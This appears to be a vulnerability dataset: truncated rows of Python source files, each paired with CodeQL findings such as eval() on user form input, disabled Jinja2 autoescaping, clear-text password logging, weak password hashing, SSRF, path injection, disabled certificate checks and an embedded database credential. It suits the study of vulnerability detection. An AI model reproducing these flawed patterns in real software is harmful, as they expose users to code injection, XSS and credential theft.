env = Environment... | 30 | 25.2 | 62 | 13 | 197 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_953f9ddeea087d44_31a6dda6", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
19
] | [
null
] | [
8
] | [
21
] | |
2024-11-18T21:52:25.685430+00:00 | 1,518,721,804,000 | df9c22d912126eaf807b6c2026951de84f32d5c4 | 4 | {
"blob_id": "df9c22d912126eaf807b6c2026951de84f32d5c4",
"branch_name": "refs/heads/master",
"committer_date": 1518721804000,
"content_id": "31c0b1af553bebf60c610081b4fb4132715d63eb",
"detected_licenses": [
"MIT"
],
"directory_id": "0c3e07ee839faa96e1edd8a65df9b9b3864889d6",
"extension": "py",
"fi... | 4.03125 | stackv2 | import json
##birthday_dict = {
## 'Colby': '05/25/1991',
## 'Tiffany': "09/27/1990",
## 'Albert': '03/14/1879',
## 'Rowan': '01/06/1955'
##}
##
##with open("birthday.json", "w") as f:
## json.dump(birthday_dict, f)
def read_dict():
with open("birthday.json", "r") as f:
birthdays = json.load... | 38 | 27.92 | 68 | 13 | 309 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_80fbf92ad4ce70d5_69981d4f", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text."
] | [
30,
34
] | [
null,
null
] | [
15,
15
] | [
19,
68
] | |
2024-11-18T21:52:29.368629+00:00 | 1,657,133,209,000 | 8db9ec9d10649c2709e5afda3b7e03f6225895ac | 3 | {
"blob_id": "8db9ec9d10649c2709e5afda3b7e03f6225895ac",
"branch_name": "refs/heads/master",
"committer_date": 1657133209000,
"content_id": "e9feb0d52d18fc5f6a190da5b39acdc4f212bf2c",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "fa0ee3daeed8edb10e98b6772fa39923243d53c5",
"extension": "py"... | 2.953125 | stackv2 | """
https://edabit.com/challenge/haaS4SBv42N3btcg5
"""
import hashlib
def get_sha256_hash(passwd: str) -> str:
m = hashlib.sha256(passwd.encode())
return m.hexdigest()
assert get_sha256_hash("hi") == "8f434346648f6b96df89dda901c5176b10a6d83961dd3c1ac88b59b2dc327aa4"
assert get_sha256_hash("password123") =... | 18 | 28.33 | 120 | 10 | 285 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_8f66b5b630cfa6a4_fb6e9450", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is in... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function."
] | [
10
] | [
null
] | [
24
] | [
39
] | |
2024-11-18T20:31:26.571784+00:00 | 1,464,097,820,000 | 717672dc42497d1531c8e85d9c42b7560c6c29a8 | 2 | {
"blob_id": "717672dc42497d1531c8e85d9c42b7560c6c29a8",
"branch_name": "refs/heads/master",
"committer_date": 1464097820000,
"content_id": "6ddac463fd251f7984533967f70b0450fa38654c",
"detected_licenses": [
"MIT"
],
"directory_id": "870ed62fbd80ea02e2e720e2ad3ab9731897dc1a",
"extension": "py",
"fi... | 2.34375 | stackv2 | from wsgiref.simple_server import make_server
from sys import exc_info
from traceback import format_tb
from wsgiref.util import request_uri, shift_path_info
from projector import Button, InputSource, HD250, ProjectorCommunicationError
from itertools import izip
from functools import wraps
import json
projector = None
... | 149 | 30.59 | 77 | 19 | 1,096 | python | [{"finding_id": "codeql_py/stack-trace-exposure_458e22584e8e30a4_d09aea46", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.", "... | 1 | true | [
"CWE-209"
] | [
"py/stack-trace-exposure"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Stack trace information](1) flows to this location and may be exposed to an external user."
] | [
137
] | [
null
] | [
12
] | [
18
] | |
2024-11-18T20:31:33.655904+00:00 | 1,345,151,317,000 | 75bdf69a195f15b9e4a54e4cc90d4886220c8943 | 3 | {
"blob_id": "75bdf69a195f15b9e4a54e4cc90d4886220c8943",
"branch_name": "refs/heads/master",
"committer_date": 1345151317000,
"content_id": "69c21c2aee81c2d443daba702bc327cf04c7c971",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "9413df86fca5302cf43a032510577e23b345cd1c",
"extension": "py"... | 2.796875 | stackv2 | """Kazoo Security
This modules includes helper functions to create digest ACL's appropriate for
use with Zookeeper.
"""
import hashlib
import zookeeper
__all__ = ("make_digest_acl", )
def make_digest_acl_credential(username, password):
"""Create a SHA1 digest credential"""
credential = "%s:%s" % (usernam... | 59 | 29.41 | 77 | 14 | 394 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_a47e30a248551112_626e2452", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is inse... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expen... | [
18
] | [
null
] | [
30
] | [
40
] | |
2024-11-18T21:10:28.511838+00:00 | 1,683,905,939,000 | 36b7337fffc4222915ddb3702757e990404e27c6 | 3 | {
"blob_id": "36b7337fffc4222915ddb3702757e990404e27c6",
"branch_name": "refs/heads/master",
"committer_date": 1683905939000,
"content_id": "f27ad3691962cf9a1e9d8dae6870200c08f19549",
"detected_licenses": [
"MIT"
],
"directory_id": "61dd0f6a64813c231ce863dbcfc6d32210e99969",
"extension": "py",
"fi... | 3.171875 | stackv2 | #!/usr/bin/env python3
"""
Passchek is a simple cli tool, checks if your password has been compromised.
This tool utilizes the k-anonymity algorithm to query Troy Hunt's
pwnedpassword API for password breaches.
MIT License
Developed by @edyatl <edyatl@yandex.ru> March 2023
https://github.com/edyatl
"""
import os
im... | 213 | 27.87 | 105 | 22 | 1,470 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_2efbd0fad36f7f6f_35a6f51c", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is inse... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function."
] | [
53
] | [
null
] | [
30
] | [
53
] | |
2024-11-18T21:10:32.214643+00:00 | 1,425,052,821,000 | d80535d161daabadafeda0bfdb5501cddaba9bc6 | 3 | {
"blob_id": "d80535d161daabadafeda0bfdb5501cddaba9bc6",
"branch_name": "refs/heads/master",
"committer_date": 1425052821000,
"content_id": "c0aed6399f3b086d843b2b43142fb2b4045c4520",
"detected_licenses": [
"CC0-1.0"
],
"directory_id": "26709045e36fd6af7216f4cb7bea3ce4a58b5c32",
"extension": "py",
... | 2.53125 | stackv2 | """This modules sends summary emails.
"""
from __future__ import print_function
import os
import time
import datetime
import smtplib
from getpass import getpass
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from report import report
from lawyer import rules
TEXT = """
Current Co... | 80 | 21.11 | 80 | 13 | 489 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_6a38045c0bc260d7_344475cb", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
47
] | [
null
] | [
21
] | [
23
] | |
2024-11-18T21:10:34.399965+00:00 | 1,571,316,812,000 | b45df19873f5c972e2417f1b9090c8a6ec673d24 | 3 | {
"blob_id": "b45df19873f5c972e2417f1b9090c8a6ec673d24",
"branch_name": "refs/heads/master",
"committer_date": 1571316812000,
"content_id": "8a048e641b52bb957cd28a1f93d31efe46944100",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "5d50271f46aaa83871ec82241f25189d46b76238",
"extension": "py"... | 2.75 | stackv2 | # coding=utf-8
import requests,flask,json
from bs4 import BeautifulSoup
class SpamInfo(object):
def __init__(self):
self.is_mark = False
self.mark_info = ''
self.mark_topone = ''
self.danger_levels = ''
class SpiderNumber(object):
def __init__(self):
self.target = 'ht... | 68 | 29.59 | 155 | 18 | 566 | python | [{"finding_id": "codeql_py/partial-ssrf_d3ef76be6da35c51_9df8597d", "tool_name": "codeql", "rule_id": "py/partial-ssrf", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "Part of the URL of this request depends on a [user-provided value](1).", "remediation": "", "location": {"fil... | 1 | true | [
"CWE-918"
] | [
"py/partial-ssrf"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Part of the URL of this request depends on a [user-provided value](1)."
] | [
24
] | [
null
] | [
15
] | [
75
] | |
2024-11-18T21:10:38.031322+00:00 | 1,634,741,999,000 | 0c4ee0ef5688c413bf47b1d7d4ba283a7dcb31c7 | 3 | {
"blob_id": "0c4ee0ef5688c413bf47b1d7d4ba283a7dcb31c7",
"branch_name": "refs/heads/master",
"committer_date": 1634741999000,
"content_id": "13370b6a6b6cdf355df82550839b99b7b793741d",
"detected_licenses": [
"MIT"
],
"directory_id": "4e65bf926f582394f00c0196f545a8a7104e287a",
"extension": "py",
"fi... | 2.8125 | stackv2 | from flask import Flask,render_template,request
app = Flask(__name__)
@app.route('/')
def hello_world():
return render_template('index.html')
@app.route('/evaluate', methods=['POST', 'GET'])
def evaluate():
rawExpr = request.form['mathexpression']
mathExpr = str(rawExpr)
try:
ans = eval(mathExp... | 20 | 25.25 | 94 | 12 | 119 | python | [{"finding_id": "codeql_py/code-injection_457250fb8ede623c_b01896c6", "tool_name": "codeql", "rule_id": "py/code-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This code execution depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "... | 1 | true | [
"CWE-094"
] | [
"py/code-injection"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This code execution depends on a [user-provided value](1)."
] | [
14
] | [
null
] | [
20
] | [
28
] | |
2024-11-18T21:37:23.173151+00:00 | 1,605,972,737,000 | ea2b0fd56af1815a2fd3469ecf455b99a68edc8f | 3 | {
"blob_id": "ea2b0fd56af1815a2fd3469ecf455b99a68edc8f",
"branch_name": "refs/heads/main",
"committer_date": 1605972737000,
"content_id": "e8e566c3a0b7eb706562b5344d8908de5bb8b5d9",
"detected_licenses": [
"MIT"
],
"directory_id": "df9afb7b1722cbfd415b0f5a356888cc00df7b4c",
"extension": "py",
"file... | 3.390625 | stackv2 | import hashlib
import subprocess
import pyAesCrypt
import sys
if len(sys.argv) <= 2:
print("\nLet's encrypt or decrypt your file.\n")
print("Usage : python3 crypt.py <encrypt/decrypt> <filename>")
else:
choose = sys.argv[1]
directory = sys.argv[2]
password = input("Enter key: ")
hash = hashlib... | 32 | 30.91 | 92 | 14 | 249 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_d5b0bbb646d1720b_d031dc4b", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function."
] | [
15
] | [
null
] | [
17
] | [
34
] | |
2024-11-18T21:37:25.663576+00:00 | 1,692,129,357,000 | d6972f10316cad03e725e9f72cd7e56522cd4cc8 | 2 | {
"blob_id": "d6972f10316cad03e725e9f72cd7e56522cd4cc8",
"branch_name": "refs/heads/master",
"committer_date": 1692129357000,
"content_id": "489aa236ab27873d79218abef27361b6eb2f24c5",
"detected_licenses": [
"MIT"
],
"directory_id": "24eaa385ce4d173d913ac01c9f03770f8802eea7",
"extension": "py",
"fi... | 2.5 | stackv2 | # -*- coding: utf-8 -*-
"""
Adapted from Yelp Fusion API code sample.
Please refer to http://www.yelp.com/developers/v3/documentation for the API
documentation.
"""
from __future__ import print_function
from __future__ import absolute_import
import argparse
import json
import pprint
import requests
import sys
import... | 269 | 34.48 | 115 | 19 | 2,250 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_887b5f71b9b65594_f1ded96b", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 8 | true | [
"CWE-312",
"CWE-312",
"CWE-295",
"CWE-295",
"CWE-295",
"CWE-295",
"CWE-295",
"CWE-295"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validat... | [
"HIGH",
"HIGH",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text.\nThis expression logs [sensitive data (password)](4) as clear text.",
"This expression logs [sensitive data (p... | [
90,
62,
91,
154,
194,
200,
209,
215
] | [
null,
null,
null,
null,
null,
null,
null,
null
] | [
75,
44,
16,
13,
12,
16,
20,
24
] | [
82,
56,
94,
50,
52,
57,
51,
59
] | |
2024-11-18T21:37:36.170573+00:00 | 1,596,689,624,000 | 340c5016fa275c45bc827ded684d07e948e8e12c | 2 | {
"blob_id": "340c5016fa275c45bc827ded684d07e948e8e12c",
"branch_name": "refs/heads/master",
"committer_date": 1596689624000,
"content_id": "89d71545c878c4f06fa570c59c76bfa80964c28a",
"detected_licenses": [
"MIT"
],
"directory_id": "83c1654e74397a11345cf85270a3b1164b0d8db6",
"extension": "py",
"fi... | 2.421875 | stackv2 |
from web3 import Web3
import flask
from flask import request, jsonify
import json
from flask_cors import CORS
from datetime import datetime
app = flask.Flask(__name__)
app.config["DEBUG"] = True
CORS(app)
ganache_url = "http://127.0.0.1:7545"
web3 = Web3(Web3.HTTPProvider(ganache_url))
BASE = "http://169.231.102.... | 271 | 34.42 | 160 | 18 | 2,540 | python | [{"finding_id": "codeql_py/path-injection_f9a176d561f679f5_b6ad3c1f", "tool_name": "codeql", "rule_id": "py/path-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This path depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unknown", ... | 1 | true | [
"CWE-022"
] | [
"py/path-injection"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This path depends on a [user-provided value](1)."
] | [
142
] | [
null
] | [
19
] | [
46
] | |
2024-11-18T21:59:11.651866+00:00 | 1,668,642,529,000 | 4b25a4515def27be9fb141ac329afef454c5fcda | 3 | {
"blob_id": "4b25a4515def27be9fb141ac329afef454c5fcda",
"branch_name": "refs/heads/master",
"committer_date": 1668642529000,
"content_id": "8397eb367bf92b44613349448405f8f22ce5eb67",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "35497e9f193dd47189d122a832972bf6271c7f6e",
"extension": "py"... | 2.53125 | stackv2 | """
Main file from which BaseStation Websocket interface begins.
"""
from flask import Flask
from flask import Blueprint, request, render_template, jsonify, session, redirect
from flask_api import status
import os.path
import json
import sys
import time
import datetime
# Minibot imports.
from .basestation_init import... | 384 | 33.78 | 140 | 21 | 3,063 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0aa3f06792e478e1_6b7ae5e6", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
226
] | [
null
] | [
23
] | [
31
] | |
2024-11-18T21:59:12.270132+00:00 | 1,689,200,951,000 | 2d8be41f480de1dde1eaf808502604470a739fdd | 3 | {
"blob_id": "2d8be41f480de1dde1eaf808502604470a739fdd",
"branch_name": "refs/heads/main",
"committer_date": 1689200951000,
"content_id": "c97128440114c7505995786b1e0b23d5275b1194",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "5e24a177efa11fc9f9e77da1413085e4d16a77df",
"extension": "py",
... | 2.609375 | stackv2 | #
# Copyright 2020, by the California Institute of Technology. ALL RIGHTS
# RESERVED. United States Government Sponsorship acknowledged. Any commercial
# use must be negotiated with the Office of Technology Transfer at the
# California Institute of Technology.
#
"""
======================
transaction_on_disk.py
==... | 189 | 38.02 | 106 | 21 | 1,418 | python | [{"finding_id": "codeql_py/overly-permissive-file_7979a8b26197b40a_c83cad81", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world readable.", "remediation": "", "location": ... | 2 | true | [
"CWE-732",
"CWE-732"
] | [
"py/overly-permissive-file",
"py/overly-permissive-file"
] | [
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Overly permissive mask in chmod sets file to world readable.",
"Overly permissive mask in chmod sets file to world readable."
] | [
173,
184
] | [
null,
null
] | [
17,
13
] | [
50,
47
] | |
2024-11-18T21:59:17.220074+00:00 | 1,531,494,835,000 | eb6e5c902a1a57213d347ed0c39f894f652c3113 | 2 | {
"blob_id": "eb6e5c902a1a57213d347ed0c39f894f652c3113",
"branch_name": "refs/heads/master",
"committer_date": 1531494835000,
"content_id": "3420953be97620640d07400381219167d10ba82b",
"detected_licenses": [
"MIT"
],
"directory_id": "90f8bad95309ae43c5a5e1acca39afe8388fa3e5",
"extension": "py",
"fi... | 2.4375 | stackv2 | """Module containing API endpoints."""
from . import api
from flask import make_response, jsonify, request, abort, current_app
from flask_httpauth import HTTPBasicAuth
from werkzeug.utils import secure_filename
import logging
from logging.handlers import RotatingFileHandler
from time import strftime
import traceback... | 327 | 33.56 | 79 | 19 | 2,327 | python | [{"finding_id": "codeql_py/log-injection_0af38bba1702a664_fd466190", "tool_name": "codeql", "rule_id": "py/log-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This log entry depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unkno... | 9 | true | [
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117"
] | [
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depen... | [
250,
251,
252,
253,
254,
284,
285,
287,
301
] | [
null,
null,
null,
null,
null,
null,
null,
null,
null
] | [
18,
18,
18,
18,
18,
18,
18,
18,
22
] | [
37,
32,
35,
56,
36,
37,
32,
35,
41
] | |
2024-11-18T22:11:24.659386+00:00 | 1,590,787,108,000 | 918d999fa99319c07d072c87e1310a0b26a91b94 | 3 | {
"blob_id": "918d999fa99319c07d072c87e1310a0b26a91b94",
"branch_name": "refs/heads/master",
"committer_date": 1590787108000,
"content_id": "6476ebe3fbea3eef5907dbb796df9cafbf4e219b",
"detected_licenses": [
"MIT"
],
"directory_id": "746d056d8cc3fe9e69828936485439f5bf90eb05",
"extension": "py",
"fi... | 2.53125 | stackv2 | # I think it was easier to get the rpg data uploaded to MongoDB
import os
import sqlite3
import pymongo
from dotenv import load_dotenv
load_dotenv()
# connect to sqlite
DB_FILEPATH = os.path.join(os.path.dirname(__file__), ".." , "module1-introduction-to-sql", "rpg_db.sqlite3")
connection = sqlite3.connect(DB_FILEPA... | 190 | 25.16 | 117 | 11 | 1,235 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_10c616e18c4b7045_d6c8c5fe", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
27
] | [
null
] | [
15
] | [
29
] | |
2024-11-18T22:11:43.321317+00:00 | 1,620,967,617,000 | 524f844e46f8b520addf6a951737e3524e3915c9 | 3 | {
"blob_id": "524f844e46f8b520addf6a951737e3524e3915c9",
"branch_name": "refs/heads/main",
"committer_date": 1620967617000,
"content_id": "82bce4eb2308e86e0f63fb19f93fcb4246380510",
"detected_licenses": [
"MIT"
],
"directory_id": "d7d033ef9686ae782bfda5e1d8ca63d8e3f0dcd2",
"extension": "py",
"file... | 2.703125 | stackv2 | from kafka import KafkaConsumer
from pathlib import Path
from requests import post, exceptions, put
from requests.auth import HTTPBasicAuth
from logger import log
import tensorflow as tf
import pandas as pd
import json
import os
HOME_SERVICE_AUTH = HTTPBasicAuth('model-builder', 'secret')
MODELS_BASE_PATH = '/models' ... | 193 | 39.08 | 115 | 17 | 1,642 | python | [{"finding_id": "codeql_py/request-without-cert-validation_97db9323622be33f_e040ba1c", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
176
] | [
null
] | [
17
] | [
111
] | |
2024-11-18T22:24:01.317085+00:00 | 1,690,547,806,000 | d2cabe2909083e880e070b5c9d8c301ee1a18a5c | 2 | {
"blob_id": "d2cabe2909083e880e070b5c9d8c301ee1a18a5c",
"branch_name": "refs/heads/master",
"committer_date": 1690547806000,
"content_id": "ca4605d7a290b8ffb078a791978c1e00b60882fc",
"detected_licenses": [
"MIT"
],
"directory_id": "34b0938b1946404bf184da8d206f4c297b6f2158",
"extension": "py",
"fi... | 2.4375 | stackv2 | import sys
import re
from .bot import BotError, BotCommand, Bot
from .models import Subscription, Node, NodeType
from .settings import translation
_ = translation.gettext
MSG_INCORRECT_COMMAND=_('Incorrect command. Use /help for the list of commands.')
MSG_OK = _('Ok.')
def _parse_node_id(string):
m = re.matc... | 271 | 29.29 | 123 | 21 | 1,820 | python | [{"finding_id": "codeql_py/incomplete-hostname-regexp_bf64cfbce0f01430_da0ab78e", "tool_name": "codeql", "rule_id": "py/incomplete-hostname-regexp", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This regular expression has an unescaped '.' before 'tkg.org', so it might match more ho... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-hostname-regexp"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This regular expression has an unescaped '.' before 'tkg.org', so it might match more hosts than expected."
] | [
16
] | [
null
] | [
22
] | [
57
] | |
2024-11-18T22:24:05.074533+00:00 | 1,519,265,696,000 | fbeb38d25031185adb91a07754593fca87f47c09 | 3 | {
"blob_id": "fbeb38d25031185adb91a07754593fca87f47c09",
"branch_name": "refs/heads/master",
"committer_date": 1519265696000,
"content_id": "c78a99a0e95cc55e48f7e036a3e9c375328e6210",
"detected_licenses": [
"MIT"
],
"directory_id": "316bbd89fbb36af7159fc2729b599436423ae193",
"extension": "py",
"fi... | 2.796875 | stackv2 | import jinja2
import re
from sys import stderr
from itertools import count
from html import unescape as html_unescape
jin_env = jinja2.Environment(loader=jinja2.PackageLoader('generator', 'templates'), autoescape=False)
def indent_lines(lines, shift=4):
if isinstance(lines, str):
lines = lines.split('\n... | 80 | 23.11 | 101 | 19 | 499 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_eb9bf1984e45e0ea_d4f3cdc5", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
8
] | [
null
] | [
11
] | [
102
] | |
2024-11-18T22:36:28.865031+00:00 | 1,542,998,953,000 | c23b42617448c93d80480190c835d437005f01b4 | 2 | {
"blob_id": "c23b42617448c93d80480190c835d437005f01b4",
"branch_name": "refs/heads/master",
"committer_date": 1542998953000,
"content_id": "7f37c76b29a2d1518e0ff22286f03e725d2de132",
"detected_licenses": [
"MIT"
],
"directory_id": "db8e8ed6cf3a236f3b142745bc3b0aeb5e33a960",
"extension": "py",
"fi... | 2.359375 | stackv2 | # (C) Copyright 2018 Hewlett Packard Enterprise Development LP.
import requests
sessionid = requests.Session()
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from Crypto.Cipher import XOR
import base64
from sqlalchemy import *
engine=create_engine('mysql://aruba:Arub... | 152 | 39.44 | 140 | 16 | 1,391 | python | [{"finding_id": "codeql_py/request-without-cert-validation_16d35bc13413c553_09de24dc", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 5 | true | [
"CWE-295",
"CWE-295",
"CWE-295",
"CWE-295",
"CWE-295"
] | [
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation becau... | [
21,
28,
36,
78,
110
] | [
null,
null,
null,
null,
null
] | [
20,
20,
20,
22,
22
] | [
94,
64,
112,
74,
93
] | |
2024-11-18T22:36:42.921526+00:00 | 1,587,976,432,000 | 9c5e0dcdbca6d050257f024d49e5879df2d4e006 | 3 | {
"blob_id": "9c5e0dcdbca6d050257f024d49e5879df2d4e006",
"branch_name": "refs/heads/master",
"committer_date": 1587976432000,
"content_id": "c8d4aa3f1579c73ca3987daca15c6044b10c74a0",
"detected_licenses": [
"MIT"
],
"directory_id": "699d22eb5f54fc2821f47d899278d52e2052a0e0",
"extension": "py",
"fi... | 2.671875 | stackv2 | import requests, configparser, base64, os, urllib.parse, re, traceback
if not os.path.exists('女优头像'):
print('“女优头像”文件夹丢失!请把它放进exe的文件夹中!\n')
os.system('pause')
# 读取配置文件,这个ini文件用来给用户设置重命名的格式和jav网址
config_settings = configparser.RawConfigParser()
print('正在读取ini中的设置...', end='')
try:
config_settings.read('ini... | 76 | 35.46 | 92 | 17 | 799 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_88988387d5bcdbfe_61b749d5", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
